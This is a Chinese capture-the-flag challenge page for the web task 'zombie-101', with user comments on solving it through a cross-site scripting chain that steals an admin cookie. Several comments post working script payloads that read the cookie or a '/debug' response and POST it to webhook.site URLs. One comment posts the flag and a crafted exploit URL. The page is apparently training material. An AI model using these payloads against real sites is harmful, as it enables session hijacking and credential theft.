zombie-101WEB 未解决

分数: 0 金币: 0
题目作者: 未知
一  血: Max_yiz
一血奖励: 0金币
解  决: 142
提  示:
描  述:
wctf{}
评论
15756309355 3月前

斯,为什么我服务器接受不到cookie的请求,网站根本没有访问我服务器

回复 0
yearling 2月前

我也拿不到cookie,难绷

回复 0

missa 3月前

请问有什么推荐的xss平台吗?网上找的没有用,自己本机去访问都收不到信息,

回复 0
vincentshine 28天前

任何一个带外网站都可以,推荐ceye

回复 0

一只小羊 5月前

<script>fetch('https://webhook.site/aa6a0e67-0dcc-4c44-94cd-ec7c8960b235',{method:'POST',body:document.cookie})</script>

回复 0
vincentshine 28天前

感谢老哥的脚本,我用其他的windows.location.href的方式打不开

回复 0

1512624649 7月前

flag=wctf{c14551c-4dm1n-807-ch41-n1c3-j08-93261} http://82.157.146.43:14179/visit?url=http%3A%2F%2F82.157.146.43%3A14179%2Fzombie%3Fshow%3D%253Cscript%253Efetch%2528%2527%252Fdebug%2527%2529.then%252

回复 1

15614005380 9月前

典型的xss盗管理员cookie,网上随便找一个xss平台,或者自己用服务器建一个

回复 0

meilanzhuju 9月前

有点晕乎

回复 0

qingfeng1115 11月前

<script>fetch('/debug').then(r=>r.json()).then(j=>fetch('https://webhook.site/8ab574ff-b363-48a3-a1b3-4455a3001925',{method:'POST',body:j.cookie}))</script> 中https://webhook.site/8a

回复 0

yituoshi 1年前

Half the truth is often a big lie: "flag=wctf{c14551c-4dm1n-807-ch41-n1c3-j08

回复 0

justsosoloveyou 1年前

第一个框反射xss,第二个框存储xss。将第一个框触发xss的url输入到第二个框,后台自动访问url后即可触发xss盗取cookie里的flag。注意需要将js编码。

回复 3
lltong 8月前

将js编码,是怎么编码呢

回复 0

WriteUp

image
a2cai

3 金币

评分(0)

暂无评分

解题动态

黑客小贺 攻破了该题 1小时前
n0th1n9 攻破了该题 2小时前
sraiL 攻破了该题 1天前
luu1 攻破了该题 2天前
Chls123 攻破了该题 20天前
rouzongbaba 攻破了该题 21天前
littlebear4 攻破了该题 27天前
vincentshine 攻破了该题 28天前
vnuesa 攻破了该题 28天前
Janenancy 攻破了该题 1月前
admin9101 攻破了该题 1月前
wlen 攻破了该题 1月前
molde 攻破了该题 1月前
krioee 攻破了该题 1月前
UrgerZ 攻破了该题 1月前
fogoo 攻破了该题 1月前
garlicfish 攻破了该题 2月前
菜狗打比赛 攻破了该题 2月前
mk012 攻破了该题 2月前
1311675072 攻破了该题 3月前
问题反馈